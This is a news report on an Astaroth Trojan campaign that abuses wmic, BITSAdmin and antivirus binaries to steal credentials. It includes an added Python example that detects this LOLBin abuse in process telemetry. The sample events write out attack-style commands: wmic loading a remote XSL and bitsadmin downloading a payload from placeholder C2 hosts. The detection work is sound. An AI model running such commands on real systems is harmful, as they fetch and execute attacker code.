A new Astaroth Trojan campaign targeting individuals in Brazil and European countries is abusing Avast antivirus and security software developed by GAS Tecnologia to steal online credentials and personal information, according to new research from cybersecurity firm Cybereason.
Cybereason’s Nocturnus Research team said that the malware uses “legitimate, built-in Windows OS processes to perform malicious activities and deliver a payload without being detected” and makes use of “well-known tools and even antivirus software to expand its capabilities.”
The Astaroth Trojan was previously detected by security researchers at Cofense in October of last year. The Trojan specifically targeted individuals in South America during 2017 and is known for taking advantage of Living Off the Land binaries (LOLBins).
The new Astaroth variant discovered by Cybereason’s researchers uses tools like the “BITSAdmin utility and the WMIC utility to interact with a C2 server and download a payload.”
As in previous spam campaigns, the new variant arrives as a .7zip archive, delivered to targets either as an e-mail attachment or via a hyperlink.
“The downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware. Upon initialization, a process spawns that uses the legitimate wmic.exe to initialize an XSL Script Processing attack,” Cybereason said.
The malware then connects to a command-and-control (C2) server and sends information about the infected computer to it. Once the encrypted XSL script has been downloaded to the infected machine, the Trojan uses BITSAdmin to fetch the attackers’ payload from a separate C2 server.
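The chain described above (a .lnk launching wmic.exe with a remote stylesheet via /format:, and bitsadmin.exe then fetching a payload) is exactly what a defender hunts for in process-creation telemetry, because the binaries are legitimate and only the invocation is abnormal. The following Python is an added example, not code from Cybereason or from the article: it runs three simple rules over a handful of constructed Sysmon-style process events. The field names, hostnames, paths and command lines are illustrative assumptions, not indicators from the campaign.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    """Minimal stand-in for a process-creation record (Sysmon Event ID 1 style).
    The field names are an assumption for this example, not a vendor schema."""
    image: str          # full path of the started binary
    parent_image: str   # full path of the process that started it
    command_line: str


# Rule 1: wmic.exe /format: pointing at a URL, a UNC path or an .xsl file.
# Built-in formats (list, csv, htable, ...) are bare keywords and do not match.
WMIC_XSL = re.compile(
    r"/format\s*:\s*[\"']?(?:https?://|\\\\|[^\s\"']*\.xsl\b)", re.IGNORECASE)

# Rule 2: bitsadmin.exe /transfer with a remote URL as the source.
BITS_URL = re.compile(r"/transfer\b.*?\bhttps?://", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> List[str]:
    """Return the names of the rules that fire on one event (empty if benign)."""
    reasons = []
    exe, parent = _basename(ev.image), _basename(ev.parent_image)
    if exe == "wmic.exe" and WMIC_XSL.search(ev.command_line):
        reasons.append("wmic-xsl-script-processing")
    if exe == "bitsadmin.exe" and BITS_URL.search(ev.command_line):
        reasons.append("bitsadmin-remote-download")
    # Rule 3: wmic.exe normally spawns nothing; a child process means the
    # script embedded in the stylesheet is executing something.
    if parent == "wmic.exe" and exe != "wmic.exe":
        reasons.append("child-of-wmic")
    return reasons


def scan(events: List[ProcessEvent]) -> List[Tuple[str, List[str]]]:
    """Run every rule over a batch of events; return (binary, rules) per hit."""
    hits = []
    for ev in events:
        rules = classify(ev)
        if rules:
            hits.append((_basename(ev.image), rules))
    return hits


# Constructed sample telemetry for this example; hostnames and paths are
# made up and are not indicators from the campaign.
SAMPLE_EVENTS = [
    ProcessEvent(
        image=r"C:\Windows\System32\wbem\WMIC.exe",
        parent_image=r"C:\Windows\explorer.exe",
        command_line=r'wmic os get /format:"https://c2.example.invalid/v.xsl"'),
    ProcessEvent(
        image=r"C:\Windows\System32\bitsadmin.exe",
        parent_image=r"C:\Windows\System32\wbem\WMIC.exe",
        command_line=(r"bitsadmin /transfer job1 /download /priority high "
                      r"https://cdn.example.invalid/img01.jpg "
                      r"C:\Users\Public\img01.jpg")),
    ProcessEvent(                                   # benign: built-in format
        image=r"C:\Windows\System32\wbem\WMIC.exe",
        parent_image=r"C:\Windows\System32\cmd.exe",
        command_line=r"wmic logicaldisk get caption,size /format:list"),
    ProcessEvent(                                   # benign: no transfer
        image=r"C:\Windows\System32\bitsadmin.exe",
        parent_image=r"C:\Windows\System32\cmd.exe",
        command_line=r"bitsadmin /list /allusers"),
]


if __name__ == "__main__":
    for binary, rules in scan(SAMPLE_EVENTS):
        print(f"{binary}: {', '.join(rules)}")
```

The rules key on the shape of the command line and on the parent/child relationship rather than on hashes or domains, which is the point of LOLBin detection: the binary is trusted, so the abuse shows in how it was invoked and by whom. Built-in wmic formats such as /format:list never match; an .xsl stylesheet under %SystemRoot%\System32\wbem would, so baseline that rule against your own environment before alerting on it.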
“Masqueraded as JPEGs, GIFs”
The cybersecurity researchers said the payload files are “masqueraded as JPEGs, GIFs, and extensionless files, and contain the Astaroth modules”.
In addition, if Avast is not present on the infected machine, the Trojan uses unins000.exe, a process from GAS Tecnologia’s security software, to collect personal user information without being detected.
“Once the campaign has successfully infiltrated, it will log the user’s keystrokes, intercept their operating system calls, and gather any information saved to the clipboard continuously. With these methods, it uncovers significant amounts of personal information from the user bank accounts and business accounts,” Cybereason researchers said.
“Additionally, in conjunction with NetPass, it gathers user login passwords across the board, undetected, including any of their remote computers on LAN, mail account passwords, Messenger accounts, Internet Explorer passwords, and others.”
Cybereason concluded in its analysis that the tools used in the Astaroth campaign show just how effective these techniques are at evading antivirus products.
“As we enter 2019, we anticipate that the use of WMIC and other Living Off The Land binaries (LOLbins) will increase,” Cybereason said. “Because of the great potential for malicious exploitation inherent in the use of LOLbins, it is very likely that many other information stealers will adopt this method to deliver their payload into targeted machines.”